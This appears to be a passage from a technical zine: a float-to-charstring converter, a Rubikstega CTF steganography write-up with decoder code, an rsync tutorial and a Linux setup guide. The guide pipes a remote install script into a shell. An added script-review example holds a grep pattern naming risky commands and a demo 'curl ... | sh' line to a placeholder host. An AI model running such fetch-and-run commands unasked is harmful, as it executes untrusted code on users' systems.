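    mant = target & 0x7FFFFF
    if exp == 0xFF:
        raise ValueError("inf/NaN not handled in this example")
    if exp == 0:
        if mant == 0:                                  # +0.0 / -0.0
            return [("push", 0)] + ([("neg",)] if sign else [])
        # denormal: solve for the exact 2**14 * x first, then divide back down
        bigger = to_bits(from_bits(target) * (1 << MAX_POW))
        return convert(bigger) + scale_ops(-MAX_POW)
    # normal: push sign + mantissa with exponent 14, then fix the exponent
    start = (0x800000 | mant) << 7                     # 1.mant * 2**14 as Fixed16.16
    ops = [("push", -start if sign else start)]
    return ops + scale_ops((exp - 127) - MAX_POW)


def run(ops) -> float:
    """Replay the op list on a float32 operand stack."""
    stack = []
    for op in ops:
        if op[0] == "push":
            stack.append(f32(op[1] / 65536.0))       # opcode 255 semantics
        elif op[0] == "neg":
            stack.append(-stack.pop())
        else:
            b, a = stack.pop(), stack.pop()
            stack.append(f32(a * b if op[0] == "mul" else a / b))
    return stack[-1]


if __name__ == "__main__":
    for d in (0xdeadc0de, 0x3f800000, 0x00000001, 0x80000000):
        ops = convert(d)
        print(f"{d:#010x}: {len(ops)} ops -> {to_bits(run(ops)):#010x}")
```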

The converter is available on GitHub³, and produces charstrings accepted by the Font Tools ttx (de)compiler⁴. Happy hacking!


3. https://j00ru.vexillium.org/int_to_float_opentype
4. https://github.com/fonttools/fonttools


Scrambled: Rubik's Cube based 
steganography (from UTCTF 19) 


Disclaimer: I wrote this problem for UT CTF, but I did not come up with the idea (I'm not that smart). This entire system was proposed in the paper 'Rubikstega: A Novel Noiseless Steganography Method in Rubik's Cube'¹, and I just implemented it.


Prompt

[three comma-separated scramble strings; garbled in this scan]


Solution

Since I made the problem, I'm going to cheat a little and use my God-like problem-writer powers to determine that the problem has to do with Rubikstega (for those not so clairvoyantly inclined, 'Rubikstega' was released as a hint later on in the CTF). Rubikstega is a steganography system that uses Rubik's Cube scramble notation to encode the data. There are 18 notations for Rubik's Cube scrambles, but in Rubikstega they're grouped into 9 pairs. There's a default encoding table that maps the numbers 0-8 to a pair of notations, and one of the notations from the pair is randomly chosen to represent that number. To encode a message, you first generate a permutation of the default encoding table, with 0-8 now mapping to different notation pairs. This is encoded in the permutation header along with some random padding. To start encoding the message, you convert each character into its binary representation, then concatenate all of them into one large binary string. Next you convert that long binary string to base 9, and use the permuted encoding table to convert the base 9 digits to scramble notation. Once the message is encoded, you make the length header by combining the length of the encoded message with more random padding. The final message is the permutation header, the length header and finally the actual message. My explanation glossed over quite a few details, so if you're interested in the specifics you should check the paper. Now, in order to decode, you just do those steps in reverse:


Step 0: Write some helper methods

import math, random

# default encoding table: the 18 scramble notations -> digits 0-8, two per digit
moves = {...}
shuffleNums = dict()

# Convert a base 9 number to a string
def nineToStr(nine):
    return decToStr(int(str(nine), 9))

# Convert a decimal number to a string
def decToStr(dec):
    return bytes.fromhex(hex(dec).replace('L', '')[2:]).decode('utf-8')

# Convert scramble notation to base 9 (dict=1: use the permuted table)
def scrambleToNine(scramble, dict):
    if dict:
        result = ''.join(str(shuffleNums[moves[move]]) for move in scramble.split())
    else:
        result = ''.join(str(moves[move]) for move in scramble.split())
    return result


Step 1: Decode the permutation header

def decodePerm(head):
    decoded = str(int(str(scrambleToNine(head, 0)), 9))
    shuffle = list(decoded[int(decoded[0]) + 1 : int(decoded[0]) + 1 + 9])
    for key in shuffle:
        shuffleNums[int(key)] = shuffle.index(key)


Step 2: Decode the length information

def decodeLength(head):
    decoded = str(int(str(scrambleToNine(head, 1)), 9))
    return decoded[int(decoded[0]) + 2 : int(decoded[0]) + 2 + int(decoded[1])]


Step 3: Decode the message!

def decode(cipher):
    scrambles = cipher.split(',')
    decodePerm(scrambles[0])
    encoded = ''.join(scrambles[2:])
    decoded = nineToStr(str(scrambleToNine(encoded, 1))[:int(decodeLength(scrambles[1]))])
    return decoded


Add in a main method to get input and call decode(), pass in the 3 scrambles from the prompt, and we get the decoded message: utflag{my_braln_1s_scramb13d}!
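An added encode/decode round trip following the description above and the header layouts the solution code parses (not the author's solver or the paper's code); the nine notation pairs are a constructed table, since the paper's default table is not on this page.

```python
"""Rubikstega-style round trip: encode a message into scramble notation
and decode it again.

Added example, not the author's solver or the paper's code: it follows the
scheme the write-up describes and keeps the header layouts the solution
parses (pad length, pad digits, then the 9-digit permutation; pad length,
length-digit count, pad digits, then the length).  PAIRS is a constructed
table; the paper's default table is not on this page.
"""
import random

PAIRS = [("U", "U'"), ("D", "D'"), ("L", "L'"), ("R", "R'"), ("F", "F'"),
         ("B", "B'"), ("U2", "D2"), ("L2", "R2"), ("F2", "B2")]
DEFAULT = {move: d for d, pair in enumerate(PAIRS) for move in pair}  # move -> pair index
IDENTITY = {d: d for d in range(9)}


def to_base9(n: int) -> str:
    digits = ""
    while n:
        n, r = divmod(n, 9)
        digits = str(r) + digits
    return digits or "0"


def digits_to_moves(digits: str, table: dict, rng) -> str:
    """Each base-9 digit -> a random member of pair table[digit]."""
    return " ".join(rng.choice(PAIRS[table[int(d)]]) for d in digits)


def moves_to_digits(scramble: str, table: dict) -> str:
    """Each move -> its pair index -> the digit table[pair index]."""
    return "".join(str(table[DEFAULT[move]]) for move in scramble.split())


def random_digits(rng, count: int) -> str:
    return "".join(str(rng.randint(0, 9)) for _ in range(count))


def encode(message: str, rng) -> str:
    perm = list(range(9))
    rng.shuffle(perm)                               # digit d is written with pair perm[d]
    enc_table = dict(enumerate(perm))
    # Permutation header, default table: p, p pad digits, the 9-digit permutation.
    p = rng.randint(1, 9)
    head = str(p) + random_digits(rng, p) + "".join(map(str, perm))
    perm_header = digits_to_moves(to_base9(int(head)), IDENTITY, rng)
    # Body: bytes -> bits -> one integer -> base 9 -> permuted moves, plus padding.
    bits = "".join(f"{b:08b}" for b in message.encode())
    body = to_base9(int(bits, 2))
    body_moves = digits_to_moves(body + to_base9(rng.randint(1, 9999)), enc_table, rng)
    # Length header, permuted table: p, digit count of len, p pad digits, len, padding.
    p2, n = rng.randint(1, 9), str(len(body))
    lhead = str(p2) + str(len(n)) + random_digits(rng, p2) + n + random_digits(rng, 3)
    length_header = digits_to_moves(to_base9(int(lhead)), enc_table, rng)
    return ",".join([perm_header, length_header, body_moves])


def decode(cipher: str) -> str:
    perm_s, len_s, *body_s = cipher.split(",")
    head = str(int(moves_to_digits(perm_s, IDENTITY), 9))
    p = int(head[0])
    perm = [int(c) for c in head[p + 1:p + 10]]
    dec_table = {pair: d for d, pair in enumerate(perm)}   # pair index -> digit
    lhead = str(int(moves_to_digits(len_s, dec_table), 9))
    p2, nd = int(lhead[0]), int(lhead[1])
    length = int(lhead[p2 + 2:p2 + 2 + nd])
    n = int(moves_to_digits(" ".join(body_s), dec_table)[:length], 9)
    return n.to_bytes((n.bit_length() + 7) // 8, "big").decode()


def roundtrip(message: str, seed: int = 2019) -> str:
    """Encode with a seeded RNG and decode the result (used by the self-check)."""
    return decode(encode(message, random.Random(seed)))


if __name__ == "__main__":
    cipher = encode("utflag{constructed_example}", random.Random(2019))
    print(cipher)
    print(decode(cipher))
```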


1. http://informatika.stei.itb.ac.id/~rinaldi.munir/TA/Makalah_TA_Ade_Yusuf.pdf


github.com/alex-bellon/rubikstega Alex Bellon 


Rsync - the new cp 


1 Introduction 


For everyone who is still before or during their transition 
to fully automatic full-blown CI/CD pipelines, you may 
often find yourself copying lots of files, not only on a 
local machine, but also between servers. 

While for many simple use cases cp will be enough, 
you may often find yourself looking for some additional 
features that cp is not capable of. Not to look far, copy- 
ing to or from remote machines is a really common task 
which is beyond powers of cp. The next missing fea- 
ture is tracking copying progress which is useful while 
transferring large files. 

So what can we do about it? As you may have already guessed there is a way to overcome these issues, and rsync is our savior. As its manual¹ suggests, it's a fast and versatile file-copying tool. It allows us to synchronize files not only locally but also between remote machines. It has a lot of useful options that should satisfy almost everyone.


2 Setup 


We can install it simply by calling the following command on Ubuntu (or a similar command on other systems).


$ sudo apt-get install rsync


Next we can modify our .bash_aliases file by adding the following line. In this example we are overriding the default copying command of our system, but if you wish to leave cp usable, just change the alias shown below to something like cpr.


alias cp="rsync -ah --inplace --info=progress2"


Listing 1: ".bash_aliases"


The last thing you have to do to use your new com- 
mand is restarting your terminal. Now you can try out 
if everything is working fine. Just copy a file and check 
if you can see the progress printed in your terminal. If 
so, you are done! 


3 Options 


In this section we will review some of the most popular 
rsync options. This will include ones we’ve used in our 
alias as well as some additional ones which may come in 
handy some day. 


1. https://linux.die.net/man/1/rsync


Bartosz Sadel 
3.1 Archive mode


The first and one of the most important options is the 
archive mode enabled by -a (which is in fact a combi- 
nation of a few other flags). This flag enables recursive 
copying as well as preserves most of file attributes like 
owner (only when run as a superuser), group (requires 
superuser if you don’t belong to the group) or permis- 
sions. When copying to remote, by default user/group 
names are used, but you can change that behavior to 
use uid/gid instead. 


3.2 Remote sync 


Synchronization between remote machines is a feature which doesn't require any additional flags. You can move files both ways, that is from remote to local and vice versa. By default you cannot copy from remote to remote, but there are ways to achieve this². Sample command transferring to a remote:


$ cp file bsadel@remote:/home/bsadel/


Remembering that rsync uses ssh we can leverage its 
config file to use our server aliases and default users. 


Host my-host
    HostName 172.39.14.124
    User bsadel


Listing 2: ".ssh/config"


With such a file you can simply copy it without the 
need to specify the username or any other things like 
non-default ssh key. 


$ cp file my-host:/home/bsadel/


3.3 Progress indicator


rsync supports two ways of showing progress: either per file (achieved with --progress) or overall (flag --info=progress2). To see it in a more pleasant format you can add -h so that numbers are shown in kilobytes or megabytes instead of raw bytes.


3.4 In-place copying 


By default, when rsync synchronizes a local file which already exists at the destination, it writes to an intermediate (temporary) file first. The --inplace flag changes that behavior so that the file is updated directly, without creating any additional artifacts. It's especially useful when synchronizing large files/directories.


4 More 


For more options and examples look at the rsync manual page or search for articles like this³ one by Pradeep Kumar. Also check out the Rsync cheatsheet⁴.


2 https://backreference.org/2015/02/09/remote-to-remote-data-copy/
3 https://www.linuxtechi.com/rsync-command-examples-linux/
4 https://devhints.io/rsync
What to pack for a deserted Linux Island :-)?


Things I insist on installing on every new Linux server I work on, and you should too


It’s that time again. You finally manage to ssh into your 
brand-new server, aaaand... 


It sucks. You think to yourself, "ah, if only I had time to set this up like I WANT it to be, this machine would've been a treat". But alas; you choose to save time by chugging on with the basic terminal for hours, which ends up slowing you down. My point is: Tooling is king.


Tooling increases productivity, lowers frustration, and makes you look cool.

pro·duc·tiv·i·ty¹ noun; The effectiveness of productive effort, especially in industry, as measured in terms of the rate of output per unit of input.


[i] Tooling is important where you intend to actually work. If 
this is a server you just ssh into to restart a crashed service, 
then this guide might be somewhat irrelevant. 


So, what do I install the moment I log into a new Linux machine², as a starter pack of efficiency? Grab your coffee and ssh into your neglected server that wants some love.


First things first, update your current software.

$ sudo apt-get update

And get software that gets other software.

$ sudo apt install curl # (and wget)
$ sudo apt install git-all


Now for the fun and oh so opinionated stuff. These are 
personal (but tried and true) favorite programs and 
configurations. Give them a shot. 


1 https://www.lexico.com/en/definition/productivity


2 This guide is for Debian-based releases. Make adaptations as necessary.


@ShayNehmad on twitter 
https://github.com/ShayNehmad 




The Shell 
I recommend you get the coolest one:


$ sudo apt install zsh


When you launch it for the first time, use the wizard to configure it to your liking. If you don't configure autocomplete and chdir without cd, you're wrong. Then get oh-my-zsh³ (for the security-minded folks out there - after reviewing the script of course).


$ sh -c "$(curl -fsSL https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
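The review step the text recommends before running that command, as an added example that is neither the article's nor oh-my-zsh's own code: fetch_installer, review_hints and run_reviewed are hypothetical names, the URL is the one the article uses, and the scripts in demo are constructed.

```shell
#!/bin/sh
# Added example (not from the article): the article says to review the
# oh-my-zsh install script before running it. This splits curl | sh into
# download, review and run, with a hash pinned at review time so the
# script is refused if its contents change before it is executed.
# The URL is the one the article uses; the grep patterns are only a
# reading aid (where to look first), not a verdict on the script.
INSTALLER_URL="https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh"

# Save the script to a file instead of a pipe; print its sha256 (coreutils) to pin.
fetch_installer() {
    curl -fsSL "$INSTALLER_URL" -o "$1" || return 1
    sha256sum "$1" | cut -d' ' -f1
}

# List (on stderr) and count (on stdout) lines that touch privileges,
# delete files, fetch more code or evaluate built strings.
review_hints() {
    pat='sudo|rm -rf|curl|wget|eval|base64|chmod|chsh'
    grep -nE "$pat" "$1" >&2
    grep -cE "$pat" "$1"
}

# Run the script only if it still hashes to the pinned value.
run_reviewed() {
    actual=$(sha256sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ] || { echo "hash mismatch, not running $1" >&2; return 1; }
    sh "$1"
}

# Offline demonstration on constructed scripts (not the real installer).
demo() {
    f=$(mktemp) || return 1
    printf '%s\n' '#!/bin/sh' 'echo ok' 'sudo chsh -s /bin/zsh "$USER"' \
        'curl -fsSL https://example.invalid/plugin.sh | sh' > "$f"
    hints=$(review_hints "$f" 2>/dev/null)             # 2 lines to read
    pin=$(sha256sum "$f" | cut -d' ' -f1)
    printf '# edited after review\n' >> "$f"             # contents changed
    if run_reviewed "$f" "$pin" 2>/dev/null; then v=ran; else v=refused; fi
    g=$(mktemp) && printf 'echo ok\n' > "$g"             # harmless script
    out=$(run_reviewed "$g" "$(sha256sum "$g" | cut -d' ' -f1)")
    rm -f "$f" "$g"
    echo "$hints $v $out"                                 # 2 refused ok
}

demo
```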


Don't forget to add 2-letter-long aliases to the most frequently used paths (e.g. source, bin and logs). Super fast cd-ing. Also, random themes are fun.


The Terminal(s) 

More terminals == more throughput == more productivity == more happiness. That's just math. Get tmux, oh-my-tmux⁴, powerline and nerdfonts.


$ sudo apt install tmux
$ git clone https://github.com/gpakosz/.tmux.git   # in your home directory
$ ln -s -f .tmux/.tmux.conf
$ cp .tmux/.tmux.conf.local .


The Text Editor 

I could write a whole article on why to use vim. In short, it's fast and effective. To improve the experience of using vim: get pathogen (vim package manager) and nerdtree⁵ to browse files quickly. Map <C+n> to open nerdtree.


The Browser 

If you need one, get one (I like Chrome). One thing you can't miss is the extension vimium⁶: it allows you to navigate the web using the keyboard alone.


Thank me later. Now you’ll have the time 
@ShayNehmad on Twitter and GitHub. 


3 https://ohmyz.sh/
4 https://github.com/gpakosz/.tmux
5 https://github.com/scrooloose/nerdtree
6 https://vimium.github.io/